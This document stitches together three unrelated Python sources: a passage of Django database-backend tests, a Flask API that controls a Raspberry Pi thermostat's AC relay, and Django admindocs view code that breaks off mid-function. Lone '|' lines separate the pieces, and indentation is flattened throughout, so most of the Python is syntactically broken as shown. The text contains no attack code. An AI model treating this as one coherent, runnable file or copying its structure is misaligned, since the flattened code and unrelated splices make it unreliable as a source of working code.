obj.m2m_also_quite_long_zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz.add(rel_obj)
@skipUnlessDBFeature('supports_long_model_names')
def test_sequence_name_length_limits_flush(self):
"""Test that sequence resetting as part of a flush with model with long name and long pk name doesn't error. Ref #8901"""
        # A full flush is expensive for the whole test run, so we dig into the
# internals to generate the likely offending SQL and run it manually
# Some convenience aliases
VLM = models.VeryLongModelNameZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ
VLM_m2m = VLM.m2m_also_quite_long_zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz.through
tables = [
VLM._meta.db_table,
VLM_m2m._meta.db_table,
]
sequences = [
{
'column': VLM._meta.pk.column,
'table': VLM._meta.db_table
},
]
cursor = connection.cursor()
for statement in connection.ops.sql_flush(no_style(), tables, sequences):
cursor.execute(statement)
class SequenceResetTest(TestCase):
def test_generic_relation(self):
"Sequence names are correct when resetting generic relations (Ref #13941)"
# Create an object with a manually specified PK
models.Post.objects.create(id=10, name='1st post', text='hello world')
# Reset the sequences for the database
cursor = connection.cursor()
commands = connections[DEFAULT_DB_ALIAS].ops.sequence_reset_sql(no_style(), [models.Post])
for sql in commands:
cursor.execute(sql)
# If we create a new object now, it should have a PK greater
# than the PK we specified manually.
obj = models.Post.objects.create(name='New post', text='goodbye world')
self.assertTrue(obj.pk > 10)
class PostgresVersionTest(TestCase):
def assert_parses(self, version_string, version):
self.assertEqual(pg_version._parse_version(version_string), version)
def test_parsing(self):
"""Test PostgreSQL version parsing from `SELECT version()` output"""
self.assert_parses("PostgreSQL 8.3 beta4", 80300)
self.assert_parses("PostgreSQL 8.3", 80300)
self.assert_parses("EnterpriseDB 8.3", 80300)
self.assert_parses("PostgreSQL 8.3.6", 80306)
self.assert_parses("PostgreSQL 8.4beta1", 80400)
self.assert_parses("PostgreSQL 8.3.1 on i386-apple-darwin9.2.2, compiled by GCC i686-apple-darwin9-gcc-4.0.1 (GCC) 4.0.1 (Apple Inc. build 5478)", 80301)
def test_version_detection(self):
"""Test PostgreSQL version detection"""
# Helper mocks
class CursorMock(object):
"Very simple mock of DB-API cursor"
def execute(self, arg):
pass
def fetchone(self):
return ["PostgreSQL 8.3"]
class OlderConnectionMock(object):
"Mock of psycopg2 (< 2.0.12) connection"
def cursor(self):
return CursorMock()
# psycopg2 < 2.0.12 code path
conn = OlderConnectionMock()
self.assertEqual(pg_version.get_version(conn), 80300)
class PostgresNewConnectionTest(TestCase):
"""
#17062: PostgreSQL shouldn't roll back SET TIME ZONE, even if the first
transaction is rolled back.
"""
@unittest.skipUnless(
connection.vendor == 'postgresql' and connection.isolation_level > 0,
"This test applies only to PostgreSQL without autocommit")
def test_connect_and_rollback(self):
new_connections = ConnectionHandler(settings.DATABASES)
new_connection = new_connections[DEFAULT_DB_ALIAS]
try:
# Ensure the database default time zone is different than
# the time zone in new_connection.settings_dict. We can
# get the default time zone by reset & show.
cursor = new_connection.cursor()
cursor.execute("RESET TIMEZONE")
cursor.execute("SHOW TIMEZONE")
db_default_tz = cursor.fetchone()[0]
new_tz = 'Europe/Paris' if db_default_tz == 'UTC' else 'UTC'
new_connection.close()
# Fetch a new connection with the new_tz as default
# time zone, run a query and rollback.
new_connection.settings_dict['TIME_ZONE'] = new_tz
new_connection.enter_transaction_management()
cursor = new_connection.cursor()
new_connection.rollback()
# Now let's see if the rollback rolled back the SET TIME ZONE.
cursor.execute("SHOW TIMEZONE")
tz = cursor.fetchone()[0]
self.assertEqual(new_tz, tz)
finally:
try:
new_connection.close()
except DatabaseError:
pass
# Unfortunately with sqlite3 the in-memory test database cannot be
# closed, and so it cannot be re-opened during testing, and so we
# sadly disable this test for now.
class ConnectionCreatedSignalTest(TestCase):
@skipUnlessDBFeature('test_db_allows_multiple_connections')
def test_signal(self):
data = {}
def receiver(sender, connection, **kwargs):
data["connection"] = connection
connection_created.connect(receiver)
connection.close()
cursor = connection.cursor()
self.assertTrue(data["connection"].connection is connection.connection)
connection_created.disconnect(receiver)
data.clear()
cursor = connection.cursor()
self.assertTrue(data == {})
class EscapingChecks(TestCase):
@unittest.skipUnless(connection.vendor == 'sqlite',
"This is a sqlite-specific issue")
def test_parameter_escaping(self):
#13648: '%s' escaping support for sqlite3
cursor = connection.cursor()
response = cursor.execute(
"select strftime('%%s', date('now'))").fetchall()[0][0]
self.assertNotEqual(response, None)
        # response should be a non-zero integer
self.assertTrue(int(response))
class BackendTestCase(TestCase):
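    # Helper that inserts (root, square) rows directly with cursor.executemany, bypassing the ORM.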
def create_squares_with_executemany(self, args):
cursor = connection.cursor()
opts = models.Square._meta
tbl = connection.introspection.table_name_converter(opts.db_table)
f1 = connection.ops.quote_name(opts.get_field('root').column)
f2 = connection.ops.quote_name(opts.get_field('square').column)
query = 'INSERT INTO %s (%s, %s) VALUES (%%s, %%s)' % (tbl, f1, f2)
cursor.executemany(query, args)
def test_cursor_executemany(self):
#4896: Test cursor.executemany
args = [(i, i**2) for i in range(-5, 6)]
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 11)
for i in range(-5, 6):
square = models.Square.objects.get(root=i)
self.assertEqual(square.square, i**2)
def test_cursor_executemany_with_empty_params_list(self):
#4765: executemany with params=[] does nothing
args = []
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 0)
def test_cursor_executemany_with_iterator(self):
#10320: executemany accepts iterators
args = iter((i, i**2) for i in range(-3, 2))
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 5)
args = iter((i, i**2) for i in range(3, 7))
with override_settings(DEBUG=True):
# same test for DebugCursorWrapper
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 9)
def test_unicode_fetches(self):
#6254: fetchone, fetchmany, fetchall return strings as unicode objects
qn = connection.ops.quote_name
models.Person(first_name="John", last_name="Doe").save()
models.Person(first_name="Jane", last_name="Doe").save()
models.Person(first_name="Mary", last_name="Agnelline").save()
models.Person(first_name="Peter", last_name="Parker").save()
models.Person(first_name="Clark", last_name="Kent").save()
opts2 = models.Person._meta
f3, f4 = opts2.get_field('first_name'), opts2.get_field('last_name')
query2 = ('SELECT %s, %s FROM %s ORDER BY %s'
% (qn(f3.column), qn(f4.column), connection.introspection.table_name_converter(opts2.db_table),
qn(f3.column)))
cursor = connection.cursor()
cursor.execute(query2)
self.assertEqual(cursor.fetchone(), (u'Clark', u'Kent'))
self.assertEqual(list(cursor.fetchmany(2)), [(u'Jane', u'Doe'), (u'John', u'Doe')])
self.assertEqual(list(cursor.fetchall()), [(u'Mary', u'Agnelline'), (u'Peter', u'Parker')])
def test_database_operations_helper_class(self):
# Ticket #13630
self.assertTrue(hasattr(connection, 'ops'))
self.assertTrue(hasattr(connection.ops, 'connection'))
self.assertEqual(connection, connection.ops.connection)
def test_duplicate_table_error(self):
""" Test that creating an existing table returns a DatabaseError """
cursor = connection.cursor()
query = 'CREATE TABLE %s (id INTEGER);' % models.Article._meta.db_table
with self.assertRaises(DatabaseError):
cursor.execute(query)
# We don't make these tests conditional because that means we would need to
# check and differentiate between:
# * MySQL+InnoDB, MySQL+MYISAM (something we currently can't do).
# * if sqlite3 (if/once we get #14204 fixed) has referential integrity turned
# on or not, something that would be controlled by runtime support and user
# preference.
# Instead, we just verify that the exception raised is django.db.IntegrityError.
class FkConstraintsTests(TransactionTestCase):
def setUp(self):
# Create a Reporter.
self.r = models.Reporter.objects.create(first_name='John', last_name='Smith')
def test_integrity_checks_on_creation(self):
"""
Try to create a model instance that violates a FK constraint. If it
fails it should fail with IntegrityError.
"""
a = models.Article(headline="This is a test", pub_date=datetime.datetime(2005, 7, 27), reporter_id=30)
try:
a.save()
except IntegrityError:
return
self.skipTest("This backend does not support integrity checks.")
def test_integrity_checks_on_update(self):
"""
Try to update a model instance introducing a FK constraint violation.
If it fails it should fail with IntegrityError.
"""
# Create an Article.
models.Article.objects.create(headline="Test article", pub_date=datetime.datetime(2010, 9, 4), reporter=self.r)
        # Retrieve it from the DB
a = models.Article.objects.get(headline="Test article")
a.reporter_id = 30
try:
a.save()
except IntegrityError:
return
self.skipTest("This backend does not support integrity checks.")
def test_disable_constraint_checks_manually(self):
"""
When constraint checks are disabled, should be able to write bad data without IntegrityErrors.
"""
with transaction.commit_manually():
# Create an Article.
models.Article.objects.create(headline="Test article", pub_date=datetime.datetime(2010, 9, 4), reporter=self.r)
            # Retrieve it from the DB
a = models.Article.objects.get(headline="Test article")
a.reporter_id = 30
try:
connection.disable_constraint_checking()
a.save()
connection.enable_constraint_checking()
except IntegrityError:
self.fail("IntegrityError should not have occurred.")
finally:
transaction.rollback()
def test_disable_constraint_checks_context_manager(self):
"""
When constraint checks are disabled (using context manager), should be able to write bad data without IntegrityErrors.
"""
with transaction.commit_manually():
# Create an Article.
models.Article.objects.create(headline="Test article", pub_date=datetime.datetime(2010, 9, 4), reporter=self.r)
            # Retrieve it from the DB
a = models.Article.objects.get(headline="Test article")
a.reporter_id = 30
try:
with connection.constraint_checks_disabled():
a.save()
except IntegrityError:
self.fail("IntegrityError should not have occurred.")
finally:
transaction.rollback()
def test_check_constraints(self):
"""
Constraint checks should raise an IntegrityError when bad data is in the DB.
"""
with transaction.commit_manually():
# Create an Article.
models.Article.objects.create(headline="Test article", pub_date=datetime.datetime(2010, 9, 4), reporter=self.r)
            # Retrieve it from the DB
a = models.Article.objects.get(headline="Test article")
a.reporter_id = 30
try:
with connection.constraint_checks_disabled():
a.save()
with self.assertRaises(IntegrityError):
connection.check_constraints()
finally:
transaction.rollback()
class ThreadTests(TestCase):
def test_default_connection_thread_local(self):
"""
Ensure that the default connection (i.e. django.db.connection) is
different for each thread.
Refs #17258.
"""
connections_set = set()
connection.cursor()
connections_set.add(connection.connection)
def runner():
from django.db import connection
connection.cursor()
connections_set.add(connection.connection)
for x in xrange(2):
t = threading.Thread(target=runner)
t.start()
t.join()
self.assertEqual(len(connections_set), 3)
# Finish by closing the connections opened by the other threads (the
# connection opened in the main thread will automatically be closed on
# teardown).
for conn in connections_set:
if conn != connection.connection:
conn.close()
def test_connections_thread_local(self):
"""
Ensure that the connections are different for each thread.
Refs #17258.
"""
connections_set = set()
for conn in connections.all():
connections_set.add(conn)
def runner():
from django.db import connections
for conn in connections.all():
# Allow thread sharing so the connection can be closed by the
# main thread.
conn.allow_thread_sharing = True
connections_set.add(conn)
for x in xrange(2):
t = threading.Thread(target=runner)
t.start()
t.join()
self.assertEqual(len(connections_set), 6)
# Finish by closing the connections opened by the other threads (the
# connection opened in the main thread will automatically be closed on
# teardown).
for conn in connections_set:
if conn != connection:
conn.close()
def test_pass_connection_between_threads(self):
"""
Ensure that a connection can be passed from one thread to the other.
Refs #17258.
"""
models.Person.objects.create(first_name="John", last_name="Doe")
def do_thread():
def runner(main_thread_connection):
from django.db import connections
connections['default'] = main_thread_connection
try:
models.Person.objects.get(first_name="John", last_name="Doe")
except DatabaseError as e:
exceptions.append(e)
t = threading.Thread(target=runner, args=[connections['default']])
t.start()
t.join()
# Without touching allow_thread_sharing, which should be False by default.
exceptions = []
do_thread()
# Forbidden!
self.assertTrue(isinstance(exceptions[0], DatabaseError))
# If explicitly setting allow_thread_sharing to False
connections['default'].allow_thread_sharing = False
exceptions = []
do_thread()
# Forbidden!
self.assertTrue(isinstance(exceptions[0], DatabaseError))
# If explicitly setting allow_thread_sharing to True
connections['default'].allow_thread_sharing = True
exceptions = []
do_thread()
# All good
self.assertEqual(len(exceptions), 0)
def test_closing_non_shared_connections(self):
"""
Ensure that a connection that is not explicitly shareable cannot be
closed by another thread.
Refs #17258.
"""
# First, without explicitly enabling the connection for sharing.
exceptions = set()
def runner1():
def runner2(other_thread_connection):
try:
other_thread_connection.close()
except DatabaseError as e:
exceptions.add(e)
t2 = threading.Thread(target=runner2, args=[connections['default']])
t2.start()
t2.join()
t1 = threading.Thread(target=runner1)
t1.start()
t1.join()
# The exception was raised
self.assertEqual(len(exceptions), 1)
# Then, with explicitly enabling the connection for sharing.
exceptions = set()
def runner1():
def runner2(other_thread_connection):
try:
other_thread_connection.close()
except DatabaseError as e:
exceptions.add(e)
# Enable thread sharing
connections['default'].allow_thread_sharing = True
t2 = threading.Thread(target=runner2, args=[connections['default']])
t2.start()
t2.join()
t1 = threading.Thread(target=runner1)
t1.start()
t1.join()
# No exception was raised
self.assertEqual(len(exceptions), 0)
class BackendLoadingTests(TestCase):
def test_old_style_backends_raise_useful_exception(self):
self.assertRaisesRegexp(ImproperlyConfigured,
"Try using django.db.backends.sqlite3 instead",
load_backend, 'sqlite3')
class MySQLPKZeroTests(TestCase):
"""
    Zero as id for AutoField should raise an exception in MySQL, because MySQL
    does not allow zero as an automatic primary key.
"""
@skipIfDBFeature('allows_primary_key_0')
def test_zero_as_autoval(self):
with self.assertRaises(ValueError):
models.Square.objects.create(id=0, root=0, square=1)
|
|
"""RESTful HTTP API for controlling a Raspberry Pi thermostat. API endpoints define setpoints for 8 3hr time intervals
throughout a 24hr day: 0-3, 3-6, 6-9, etc. Additionally, the user may override the scheduled setpoint for the next 3 hours.
Includes built-in hysteresis to avoid rapid on-off switching of HVAC systems; this hysteresis is not exposed in the API
for safety reasons.
"""
import collections
import datetime
import conf
import flask
import flask.json
from flask import request
import logging
import time
import os
import rpi_relay
import state
import Queue
import werkzeug.exceptions
from apscheduler.schedulers.background import BackgroundScheduler
app = flask.Flask(__name__)
# Bind these at module level so the request handlers that reference them also
# work when the app is imported by a WSGI server rather than run via __main__.
logger = logging.getLogger('main')
STATIC_DIR = os.environ.get('STATIC_DIR', 'static')
# Temperature setpoint is determined by the time of day, stored in SETPOINT_DB.
TEMP_SETPOINT_HOURS = (0, 3, 6, 9, 12, 15, 18, 21)
def get_request_db():
"Returns a dbm database. Use only in a Flask app context!"
db = getattr(flask.g, '_database', None)
if db is None:
# open a new connection as needed -- throughput doesn't need to be high for this!
db = flask.g._database = state.get_conn()
return db
@app.teardown_appcontext
def close_connection(exception):
db = getattr(flask.g, '_database', None)
if db is not None:
db.close()
def to_farenheit(c):
    "Converts a temperature in degrees Celsius to Fahrenheit."
    return 9.0/5.0 * c + 32
def get_setpoint(hour, db=None):
"Returns the temp setpoint for the given hour of day"
if db is None:
db = get_request_db()
setpoint_key = [set_hr for set_hr in TEMP_SETPOINT_HOURS if hour >= set_hr][-1]
return db[setpoint_key]
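# Worked example (illustrative): at hour=10 the interval starts satisfying
# hour >= set_hr are (0, 3, 6, 9), so get_setpoint returns db[9]; at hour=2
# only 0 qualifies and db[0] is returned.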
def parse_setpoints(json_form):
form = flask.json.loads(json_form['setpoints'])
setpoints = {}
for setpoint, val in form.iteritems():
if isinstance(setpoint, basestring):
setpoint = int(setpoint)
if isinstance(val, basestring):
val = float(val)
if setpoint in TEMP_SETPOINT_HOURS:
setpoints[setpoint] = val
else:
raise Exception("setpoint %s not valid" % setpoint)
return setpoints
@app.route('/api/v1/setpoints/', methods=('POST', 'GET'))
def handle_setpoints_request():
db = get_request_db()
if request.method == 'POST':
setpoints = parse_setpoints(request.form)
for hr, temp in setpoints.iteritems():
db[hr] = temp
return flask.json.jsonify(setpoints)
if request.method == 'GET':
setpoints = {hr: db.get(hr) for hr in TEMP_SETPOINT_HOURS}
return flask.json.jsonify(setpoints)
@app.route('/api/v1/status/', methods=('GET',))
def return_relay_status():
return flask.json.jsonify({'ac_on': rpi_relay.ac_status()})
@app.route('/api/v1/mode/', methods=('GET', 'POST'))
def handle_thermostat_mode():
if request.method == 'GET':
return flask.json.jsonify({'mode': state.CURRENT_MODE})
if request.method == 'POST':
mode = request.form.get('mode')
assert mode in [state.ThermostatModes.AUTO, state.ThermostatModes.MANUAL, state.ThermostatModes.OFF]
state.CURRENT_MODE = mode
return flask.json.jsonify({'mode': state.CURRENT_MODE})
@app.route('/api/v1/temperature/', methods=('POST', 'GET'))
def handle_temp():
    logger.info('handling temperature request')
if request.method == 'POST':
logger.warn(request.form)
temp = float(request.form.get('temperature'))
if conf.FARENHEIT is True:
temp = to_farenheit(temp)
humidity = float(request.form.get('humidity'))
logger.warn('temp=%s, humidity=%s' % (temp, humidity))
now = time.time()
state.TEMPERATURE_READINGS.append((now, temp))
state.HUMIDITY_READINGS.append((now, humidity))
return 'ok'
if request.method == 'GET':
temperatures = [x for x in state.TEMPERATURE_READINGS]
humidities = [x for x in state.HUMIDITY_READINGS]
return flask.json.jsonify(dict(temperature=temperatures, humidity=humidities))
@app.route('/api/v1/timer/', methods=('POST', 'GET'))
def handle_timer_request():
"""manual override for turning the AC on for a set amount of time."""
def get_manual_status():
if state.EVENT_QUEUE.queue:
now = time.time()
future_events = filter(lambda x: x[0] > now, state.EVENT_QUEUE.queue)
if future_events:
future_e, status = future_events[0]
return flask.json.jsonify(dict(future_sec=(future_e - now), future_status=status))
return flask.json.jsonify({})
def handle_timer(on_time):
if (on_time < conf.MIN_ON_TIME) or (on_time > conf.MAX_ON_TIME):
            raise werkzeug.exceptions.BadRequest(description='on_time outside valid range')
turn_off_event = (time.time() + on_time, False)
turn_on_event = (time.time(), True)
new_queue = Queue.PriorityQueue()
new_queue.put(turn_on_event)
new_queue.put(turn_off_event)
state.EVENT_QUEUE = new_queue
if request.method == 'POST':
on_time_int = int(request.form['on_time'])
handle_timer(on_time_int)
return get_manual_status()
if request.method == 'GET':
return get_manual_status()
def event_handler():
logger = logging.getLogger('task_queue')
q = state.EVENT_QUEUE
conn = state.get_conn()
try:
exec_time, event = q.get(block=False)
now = time.time()
if now > exec_time:
rpi_relay.set_ac_relay(event, conn)
logger.info("setting relay=%s" % event)
else:
# put the event back into the queue if it isn't time to execute it yet
q.put((exec_time, event))
q.task_done()
except Queue.Empty:
pass
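# Illustrative timeline: a POST to /api/v1/timer/ with on_time=3600 at t=1000
# enqueues (1000, True) and (4600, False). On its next tick event_handler pops
# the lowest-timestamped event, (1000, True), and switches the relay on; the
# (4600, False) event is re-queued until time.time() exceeds 4600, at which
# point the relay is switched off.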
def bangbang_controller():
def is_stale(timestamp):
if time.time() - int(timestamp) > state.STALE_READ_INTERVAL:
return True
return False
logger = logging.getLogger('bangbang_controller')
if state.CURRENT_MODE != state.ThermostatModes.AUTO:
logger.warn("mode is set to %s" % state.CURRENT_MODE)
return
conn = state.get_conn()
temp_read_time, most_recent_temp = state.TEMPERATURE_READINGS[-1]
humid_read_time, most_recent_humidity = state.HUMIDITY_READINGS[-1]
if is_stale(temp_read_time) or is_stale(humid_read_time):
state.CURRENT_MODE = state.ThermostatModes.MANUAL
logger.error("temperature readings are stale! setting mode to MANUAL")
return
now = datetime.datetime.now()
current_setpoint = get_setpoint(now.hour, db=conn)
if (most_recent_temp - current_setpoint) > (conf.HYSTERESIS_TEMP / 2.0):
turn_on_event = (time.time(), True)
state.EVENT_QUEUE.put(turn_on_event)
if rpi_relay.ac_status() is False:
logger.warn('Temp=%s, setpoint=%s, Setting AC ON' % (most_recent_temp, current_setpoint))
elif (current_setpoint - most_recent_temp) > (conf.HYSTERESIS_TEMP / 2.0):
turn_off_event = (time.time(), False)
state.EVENT_QUEUE.put(turn_off_event)
if rpi_relay.ac_status() is True:
logger.warn('Temp=%s, setpoint=%s, Setting AC OFF' % (most_recent_temp, current_setpoint))
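# Worked example (illustrative): with conf.HYSTERESIS_TEMP = 2.0 and a
# setpoint of 70, the controller requests AC ON above 71.0 and AC OFF below
# 69.0; readings in between leave the relay as-is, which is what prevents
# rapid on-off cycling.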
@app.route('/<path:path>/')
def resources(path):
return flask.send_from_directory(STATIC_DIR, path)
@app.route('/')
def index():
return flask.send_file('static/index.html')
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO, format='%(levelname)s - %(asctime)s %(message)s')
rpi_relay.init_RPi()
scheduler = BackgroundScheduler()
scheduler.start()
scheduler.add_job(event_handler, 'interval', seconds=conf.EVENT_LOOP_INTERVAL)
scheduler.add_job(bangbang_controller, 'interval', seconds=conf.BANGBANG_LOOP_INTERVAL)
logger.warn('starting scheduler')
logger.warn('starting web server')
app.run(debug=False, host='0.0.0.0')
|
|
import inspect
import os
import re
from importlib import import_module
from django.apps import apps
from django.conf import settings
from django.contrib import admin
from django.contrib.admin.views.decorators import staff_member_required
from django.contrib.admindocs import utils
from django.core import urlresolvers
from django.core.exceptions import ImproperlyConfigured, ViewDoesNotExist
from django.db import models
from django.http import Http404
from django.template.base import (
InvalidTemplateLibrary, builtins, get_library, get_templatetags_modules,
libraries,
)
from django.template.engine import Engine
from django.utils._os import upath
from django.utils.decorators import method_decorator
from django.utils.translation import ugettext as _
from django.views.generic import TemplateView
# Exclude methods starting with these strings from documentation
MODEL_METHODS_EXCLUDE = ('_', 'add_', 'delete', 'save', 'set_')
class BaseAdminDocsView(TemplateView):
"""
Base view for admindocs views.
"""
@method_decorator(staff_member_required)
def dispatch(self, request, *args, **kwargs):
if not utils.docutils_is_available:
# Display an error message for people without docutils
self.template_name = 'admin_doc/missing_docutils.html'
return self.render_to_response(admin.site.each_context(request))
return super(BaseAdminDocsView, self).dispatch(request, *args, **kwargs)
def get_context_data(self, **kwargs):
kwargs.update({'root_path': urlresolvers.reverse('admin:index')})
kwargs.update(admin.site.each_context(self.request))
return super(BaseAdminDocsView, self).get_context_data(**kwargs)
class BookmarkletsView(BaseAdminDocsView):
template_name = 'admin_doc/bookmarklets.html'
def get_context_data(self, **kwargs):
context = super(BookmarkletsView, self).get_context_data(**kwargs)
context.update({
'admin_url': "%s://%s%s" % (
self.request.scheme, self.request.get_host(), context['root_path'])
})
return context
class TemplateTagIndexView(BaseAdminDocsView):
template_name = 'admin_doc/template_tag_index.html'
def get_context_data(self, **kwargs):
load_all_installed_template_libraries()
tags = []
app_libs = list(libraries.items())
builtin_libs = [(None, lib) for lib in builtins]
for module_name, library in builtin_libs + app_libs:
for tag_name, tag_func in library.tags.items():
title, body, metadata = utils.parse_docstring(tag_func.__doc__)
if title:
title = utils.parse_rst(title, 'tag', _('tag:') + tag_name)
if body:
body = utils.parse_rst(body, 'tag', _('tag:') + tag_name)
for key in metadata:
metadata[key] = utils.parse_rst(metadata[key], 'tag', _('tag:') + tag_name)
if library in builtins:
tag_library = ''
else:
tag_library = module_name.split('.')[-1]
tags.append({
'name': tag_name,
'title': title,
'body': body,
'meta': metadata,
'library': tag_library,
})
kwargs.update({'tags': tags})
return super(TemplateTagIndexView, self).get_context_data(**kwargs)
class TemplateFilterIndexView(BaseAdminDocsView):
template_name = 'admin_doc/template_filter_index.html'
def get_context_data(self, **kwargs):
load_all_installed_template_libraries()
filters = []
app_libs = list(libraries.items())
builtin_libs = [(None, lib) for lib in builtins]
for module_name, library in builtin_libs + app_libs:
for filter_name, filter_func in library.filters.items():
title, body, metadata = utils.parse_docstring(filter_func.__doc__)
if title:
title = utils.parse_rst(title, 'filter', _('filter:') + filter_name)
if body:
body = utils.parse_rst(body, 'filter', _('filter:') + filter_name)
for key in metadata:
metadata[key] = utils.parse_rst(metadata[key], 'filter', _('filter:') + filter_name)
if library in builtins:
tag_library = ''
else:
tag_library = module_name.split('.')[-1]
filters.append({
'name': filter_name,
'title': title,
'body': body,
'meta': metadata,
'library': tag_library,
})
kwargs.update({'filters': filters})
return super(TemplateFilterIndexView, self).get_context_data(**kwargs)
class ViewIndexView(BaseAdminDocsView):
template_name = 'admin_doc/view_index.html'
def get_context_data(self, **kwargs):
views = []
urlconf = import_module(settings.ROOT_URLCONF)
view_functions = extract_views_from_urlpatterns(urlconf.urlpatterns)
for (func, regex, namespace, name) in view_functions:
views.append({
'full_name': '%s.%s' % (func.__module__, getattr(func, '__name__', func.__class__.__name__)),
'url': simplify_regex(regex),
'url_name': ':'.join((namespace or []) + (name and [name] or [])),
'namespace': ':'.join((namespace or [])),
'name': name,
})
kwargs.update({'views': views})
return super(ViewIndexView, self).get_context_data(**kwargs)
class ViewDetailView(BaseAdminDocsView):
template_name = 'admin_doc/view_detail.html'
def get_context_data(self, **kwargs):
view = self.kwargs['view']
urlconf = urlresolvers.get_urlconf()
if urlresolvers.get_resolver(urlconf)._is_callback(view):
mod, func = urlresolvers.get_mod_func(view)
view_func = getattr(import_module(mod), func)
else:
raise Http404
title, body, metadata = utils.parse_docstring(view_func.__doc__)
if title:
title = utils.parse_rst(title, 'view', _('view:') + view)
if body:
body = utils.parse_rst(body, 'view', _('view:') + view)
for key in metadata:
metadata[key] = utils.parse_rst(metadata[key], 'model', _('view:') + view)
kwargs.update({
'name': view,
'summary': title,
'body': body,
'meta': metadata,
})
return super(ViewDetailView, self).get_context_data(**kwargs)
class ModelIndexView(BaseAdminDocsView):
template_name = 'admin_doc/model_index.html'
def get_context_data(self, **kwargs):
m_list = [m._meta for m in apps.get_models()]
kwargs.update({'models': m_list})
return super(ModelIndexView, self).get_context_data(**kwargs)
class ModelDetailView(BaseAdminDocsView):
template_name = 'admin_doc/model_detail.html'
def get_context_data(self, **kwargs):
model_name = self.kwargs['model_name']
# Get the model class.
try:
app_config = apps.get_app_config(self.kwargs['app_label'])
except LookupError:
raise Http404(_("App %(app_label)r not found") % self.kwargs)
try:
model = app_config.get_model(model_name)
except LookupError:
raise Http404(_("Model %(model_name)r not found in app %(app_label)r") % self.kwargs)
opts = model._meta
title, body, metadata = utils.parse_docstring(model.__doc__)
if title:
title = utils.parse_rst(title, 'model', _('model:') + model_name)
if body:
body = utils.parse_rst(body, 'model', _('model:') + model_name)
# Gather fields/field descriptions.
fields = []
for field in opts.fields:
# ForeignKey is a special case since the field will actually be a
# descriptor that returns the other object
if isinstance(field, models.ForeignKey):
data_type = field.remote_field.model.__name__
app_label = field.remote_field.model._meta.app_label
verbose = utils.parse_rst(
(_("the related `%(app_label)s.%(data_type)s` object") % {
'app_label': app_label, 'data_type': data_type,
}),
'model',
_('model:') + data_type,
)
else:
data_type = get_readable_field_data_type(field)
verbose = field.verbose_name
fields.append({
'name': field.name,
'data_type': data_type,
'verbose': verbose,
'help_text': field.help_text,
})
# Gather many-to-many fields.
for field in opts.many_to_many:
data_type = field.remote_field.model.__name__
app_label = field.remote_field.model._meta.app_label
verbose = _("related `%(app_label)s.%(object_name)s` objects") % {
'app_label': app_label,
'object_name': data_type,
}
fields.append({
'name': "%s.all" % field.name,
"data_type": 'List',
'verbose': utils.parse_rst(_("all %s") % verbose, 'model', _('model:') + opts.model_name),
})
fields.append({
'name': "%s.count" % field.name,
'data_type': 'Integer',
'verbose': utils.parse_rst(_("number of %s") % verbose, 'model', _('model:') + opts.model_name),
})
# Gather model methods.
for func_name, func in model.__dict__.items():
if (inspect.isfunction(func) and len(inspect.getargspec(func)[0]) == 1):
try:
for exclude in MODEL_METHODS_EXCLUDE:
if func_name.startswith(exclude):
raise StopIteration
except StopIteration:
continue
verbose = func.__doc__
if verbose:
verbose = utils.parse_rst(utils.trim_docstring(verbose), 'model', _('model:') + opts.model_name)
fields.append({
'name': func_name,
'data_type': get_return_data_type(func_name),
'verbose': verbose,
})
# Gather related objects
for rel in opts.related_objects:
verbose = _("related `%(app_label)s.%(object_name)s` objects") % {
'app_label': rel.related_model._meta.app_label,
'object_name': rel.related_model._meta.object_name,
}
accessor = rel.get_accessor_name()
fields.append({
'name': "%s.all" % accessor,
'data_type': 'List',
'verbose': utils.parse_rst(_("all %s") % verbose, 'model', _('model:') + opts.model_name),
})
fields.append({
'name': "%s.count" % accessor,
'data_type': 'Integer',
'verbose': utils.parse_rst(_("number of %s") % verbose, 'model', _('model:') + opts.model_name),
})
kwargs.update({
'name': '%s.%s' % (opts.app_label, opts.object_name),
'summary': title,
'description': body,
'fields': fields,
})
return super(ModelDetailView, self).get_context_data(**kwargs)
class TemplateDetailView(BaseAdminDocsView):
template_name = 'admin_doc/template_detail.html'
def get_context_data(self, **kwargs):
template = self.kwargs['template']
templates = []
try:
default_engine = Engine.get_default()
except ImproperlyConfigured:
# Non-trivial TEMPLATES settings aren't supported (#24125).
pass
else:
# This doesn't account for template loaders (#24128).
for index, directory in enumerate(default_engine.dirs):
template_file = os.path.join(directory, template)
templates.append({
'file': template_file,
'exists': os.path.exists(template_file),
                    # bind template_file per-iteration to avoid the late-binding closure bug
                    'contents': lambda path=template_file: open(path).read() if os.path.exists(path) else '',
'order': index,
})
kwargs.update({
'name': template,
'templates': templates,
})
return super(TemplateDetailView, self).get_context_data(**kwargs)
####################
# Helper functions #
####################
def load_all_installed_template_libraries():
# Load/register all template tag libraries from installed apps.
for module_name in get_templatetags_modules():
mod = import_module(module_name)
if not hasattr(mod, '__file__'):
# e.g. packages installed as eggs
continue
try:
libraries = [
os.path.splitext(p)[0]
for p in os.listdir(os.path.dirname(upath(mod.__file__)))
if p.endswith('.py') and p[0].isalpha()
]
except OSError:
continue
else:
for library_name in libraries:
try:
get_library(library_name)
except InvalidTemplateLibrary:
pass
def get_return_data_type(func_name):
"""Return a somewhat-helpful data type given a function name"""
if func_name.startswith('get_'):
if func_name.endswith('_list'):
return 'List'
elif func_name.endswith('_count'):
return 'Integer'
return ''
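# For example (illustrative): 'get_friends_list' -> 'List',
# 'get_login_count' -> 'Integer', and 'get_absolute_url' -> ''.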
def get_readable_field_data_type(field):
"""Returns the description for a given field type, if it exists,
Fields' descriptions can contain format strings, which will be interpolated
against the values of field.__dict__ before being output."""
return field.description % field.__dict__
def extract_views_from_urlpatterns(urlpatterns, base='', namespace=None):
"""
Return a list of views from a list of urlpatterns.
    Each object in the returned list is a four-tuple: (view_func, regex, namespace, name)
"""
views = []
for p in urlpatterns:
if hasattr(p, 'url_patterns'):
try:
patterns = p.url_patterns
except ImportError:
continue
views.extend(extract_views_from_urlpatterns(
patterns,
base + p.regex.pattern,
(namespace or []) + (p.namespace and [p.namespace] or [])
))
elif hasattr(p, 'callback'):
try:
